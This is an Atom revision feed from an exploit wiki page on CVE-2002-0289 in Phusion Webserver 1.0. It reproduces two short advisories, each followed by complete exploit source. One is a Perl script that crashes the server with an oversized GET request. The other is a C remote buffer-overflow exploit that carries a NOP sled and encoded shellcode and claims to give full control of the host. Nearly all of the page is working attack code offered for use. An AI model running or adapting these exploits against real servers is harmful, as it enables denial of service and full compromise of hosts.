<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0289_Phusion_web_server_1.0_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2002-0289 Phusion web server 1.0 任意代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2002-0289_Phusion_web_server_1.0_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0289_Phusion_web_server_1.0_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T23:15:07Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2002-0289_Phusion_web_server_1.0_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=799&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO1== &lt;pre&gt; source: http://www.securityfocus.com/bid/4118/info  Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems....&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2002-0289_Phusion_web_server_1.0_%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=799&amp;oldid=prev"/>
		<updated>2021-03-31T07:13:31Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO1== &amp;lt;pre&amp;gt; source: http://www.securityfocus.com/bid/4118/info  Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems....&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO1==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source: http://www.securityfocus.com/bid/4118/info&lt;br /&gt;
&lt;br /&gt;
Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.&lt;br /&gt;
&lt;br /&gt;
It is possible for a remote attacker to deny service to legitimate users of the service by submitting an excessively long web request (approximately 3000+ bytes).&lt;br /&gt;
&lt;br /&gt;
It should be noted that this issue is due to a remotely exploitable buffer overflow condition. &lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
# Simple script to send a long 'A^s' command to the server, &lt;br /&gt;
# resulting in the server crashing.&lt;br /&gt;
#&lt;br /&gt;
# Phusion Webserver v1.0 proof-of-concept exploit.&lt;br /&gt;
# By Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (C)2002.&lt;br /&gt;
#&lt;br /&gt;
# Thanks all the people from Spain and Argentina.&lt;br /&gt;
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, &lt;br /&gt;
# G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
# &lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x Phusion_DoS.pl -s &amp;lt;server&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Example: &lt;br /&gt;
#&lt;br /&gt;
# perl -x Phusion_DoS.pl -s 10.0.0.1&lt;br /&gt;
# &lt;br /&gt;
# Crash was successful !&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
use Getopt::Std;&lt;br /&gt;
use IO::Socket;&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nPhusion Webserver v1.0 DoS exploit (c)2002.\n&amp;quot;);&lt;br /&gt;
print(&amp;quot;Alex Hernandez al3xhernandez\@ureach.com\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
getopts('s:', \%args);&lt;br /&gt;
if(!defined($args{s})){&amp;amp;usage;}&lt;br /&gt;
&lt;br /&gt;
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);&lt;br /&gt;
&lt;br /&gt;
$def = &amp;quot;A&amp;quot;;&lt;br /&gt;
$num = &amp;quot;3000&amp;quot;;&lt;br /&gt;
$data .= $def x $num;&lt;br /&gt;
$serv = $args{s};&lt;br /&gt;
$port = 80;&lt;br /&gt;
$buf = &amp;quot;GET /cgi-bin/$data /HTTP/1.0\r\n\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$in_addr = (gethostbyname($serv))[4] || die(&amp;quot;Error: $!\n&amp;quot;);&lt;br /&gt;
$paddr = sockaddr_in($port, $in_addr) || die (&amp;quot;Error: $!\n&amp;quot;);&lt;br /&gt;
$proto = getprotobyname('tcp') || die(&amp;quot;Error: $!\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
socket(S, PF_INET, SOCK_STREAM, $proto) || die(&amp;quot;Error: $!&amp;quot;);&lt;br /&gt;
connect(S, $paddr) ||die (&amp;quot;Error: $!&amp;quot;);&lt;br /&gt;
select(S); $| = 1; select(STDOUT);&lt;br /&gt;
print S &amp;quot;$buf&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nCrash was successful !\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
sub usage {die(&amp;quot;\n\nUsage: perl -x $0 -s &amp;lt;server&amp;gt;\n\n&amp;quot;);}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==INFO2==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source: http://www.securityfocus.com/bid/4119/info&lt;br /&gt;
&lt;br /&gt;
Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems.&lt;br /&gt;
&lt;br /&gt;
Phusion Webserver does not perform sufficient bounds checking of externally supplied data. As a result, it is possible for a remote attacker to submit an excessively long web request which may cause stack variables to be overwritten with attacker-supplied instructions.&lt;br /&gt;
&lt;br /&gt;
As webservers normally run with SYSTEM privileges on Microsoft Windows operating systems, this may result in a full compromise of a host running the vulnerable software.&lt;br /&gt;
&lt;br /&gt;
It should be noted that this unchecked buffer may also be exploited to cause a denial of service condition.&lt;br /&gt;
&lt;br /&gt;
/** Phusion-Overun.c &lt;br /&gt;
** -Remote exploit for Phusion Webserver v1.0 for WinNT.&lt;br /&gt;
**&lt;br /&gt;
** Phusion Webserver v1.0 exploit gets remote servers's full control.&lt;br /&gt;
** When you attacks a vulnerable server you can run abitrary code&lt;br /&gt;
** inside.&lt;br /&gt;
**&lt;br /&gt;
** Phusion Webserver v1.0 proof-of-concept exploit.&lt;br /&gt;
** By Alex Hernandez &amp;lt;al3xhernandez@ureach.com&amp;gt; (C)2002.&lt;br /&gt;
**&lt;br /&gt;
** Thanks all the people from Spain and Argentina.&lt;br /&gt;
** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, &lt;br /&gt;
** G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
** &lt;br /&gt;
**&lt;br /&gt;
** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c&lt;br /&gt;
**&lt;br /&gt;
** Usage: ./Phusion-ovrun &amp;lt;hostname&amp;gt;&lt;br /&gt;
**&lt;br /&gt;
**&lt;br /&gt;
** &lt;br /&gt;
**&lt;br /&gt;
**/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/socket.h&amp;gt;&lt;br /&gt;
#include &amp;lt;netinet/in.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/errno.h&amp;gt;&lt;br /&gt;
#include &amp;lt;netdb.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#define _PORT   80&lt;br /&gt;
#define _X 10000&lt;br /&gt;
&lt;br /&gt;
char runcrash[] =&lt;br /&gt;
&amp;quot;GET /&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10&amp;quot;&lt;br /&gt;
&amp;quot;\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50&amp;quot;&lt;br /&gt;
&amp;quot;\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18&amp;quot;&lt;br /&gt;
&amp;quot;\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b&amp;quot;&lt;br /&gt;
&amp;quot;\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9&amp;quot;&lt;br /&gt;
&amp;quot;\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99&amp;quot;&lt;br /&gt;
&amp;quot;\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9&amp;quot;&lt;br /&gt;
&amp;quot;\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99&amp;quot;&lt;br /&gt;
&amp;quot;\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02&amp;quot;&lt;br /&gt;
&amp;quot;\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e&amp;quot;&lt;br /&gt;
&amp;quot;\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65&amp;quot;&lt;br /&gt;
&amp;quot;\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca&amp;quot;&lt;br /&gt;
&amp;quot;\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5&amp;quot;&lt;br /&gt;
&amp;quot;\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee&amp;quot;&lt;br /&gt;
&amp;quot;\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed&amp;quot;&lt;br /&gt;
&amp;quot;\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5&amp;quot;&lt;br /&gt;
&amp;quot;\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc&amp;quot;&lt;br /&gt;
&amp;quot;\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc&amp;quot;&lt;br /&gt;
&amp;quot;\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed&amp;quot;&lt;br /&gt;
&amp;quot;\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9&amp;quot;&lt;br /&gt;
&amp;quot;\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb&amp;quot;&lt;br /&gt;
&amp;quot;\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7&amp;quot;&lt;br /&gt;
&amp;quot;\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0&amp;quot;&lt;br /&gt;
&amp;quot;\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7&amp;quot;&lt;br /&gt;
&amp;quot;\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9&amp;quot;&lt;br /&gt;
&amp;quot;\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7&amp;quot;&lt;br /&gt;
&amp;quot;\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3&amp;quot;&lt;br /&gt;
&amp;quot;\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7&amp;quot;&lt;br /&gt;
&amp;quot;\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8&amp;quot;&lt;br /&gt;
&amp;quot;\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7&amp;quot;&lt;br /&gt;
&amp;quot;\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3&amp;quot;&lt;br /&gt;
&amp;quot;\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7&amp;quot;&lt;br /&gt;
&amp;quot;\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc&amp;quot;&lt;br /&gt;
&amp;quot;\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc&amp;quot;&lt;br /&gt;
&amp;quot;\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6&amp;quot;&lt;br /&gt;
&amp;quot;\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc&amp;quot;&lt;br /&gt;
&amp;quot;\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3&amp;quot;&lt;br /&gt;
&amp;quot;\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&amp;quot;&lt;br /&gt;
&amp;quot;\x90\x90\x90\x90\x90\xac\xe0\xe3\x01&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int     sock;&lt;br /&gt;
struct  sockaddr_in sock_a;&lt;br /&gt;
struct  hostent *host;&lt;br /&gt;
&lt;br /&gt;
int main (int argc, char *argv[]) {&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n&amp;quot;);&lt;br /&gt;
printf(&amp;quot;Alex Hernandez al3xhernandez@ureach.com\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
if(argc &amp;lt; 2) {&lt;br /&gt;
   fprintf(stderr, &amp;quot;Error : Usage: %s &amp;lt;hostname&amp;gt; \n&amp;quot;, argv[0]);&lt;br /&gt;
   exit(0);&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {&lt;br /&gt;
    perror(&amp;quot;gethostbyname&amp;quot;);&lt;br /&gt;
    exit(-1);&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))&amp;lt;0) {&lt;br /&gt;
    perror(&amp;quot;create socket&amp;quot;);&lt;br /&gt;
    exit(-1);&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
sock_a.sin_family=AF_INET;&lt;br /&gt;
sock_a.sin_port=htons(_PORT);&lt;br /&gt;
memcpy((char *)&amp;amp;sock_a.sin_addr,(char *)host-&amp;gt;h_addr,host-&amp;gt;h_length);&lt;br /&gt;
if(connect(sock,(struct sockaddr *)&amp;amp;sock_a,sizeof(sock_a))!=0) {&lt;br /&gt;
    perror(&amp;quot;create connect&amp;quot;);&lt;br /&gt;
    exit(-1);&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  fflush(stdout);&lt;br /&gt;
&lt;br /&gt;
  write(sock,runcrash,_X);&lt;br /&gt;
  write(sock,&amp;quot;\n\n&amp;quot;, 2);&lt;br /&gt;
  printf(&amp;quot;done.\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>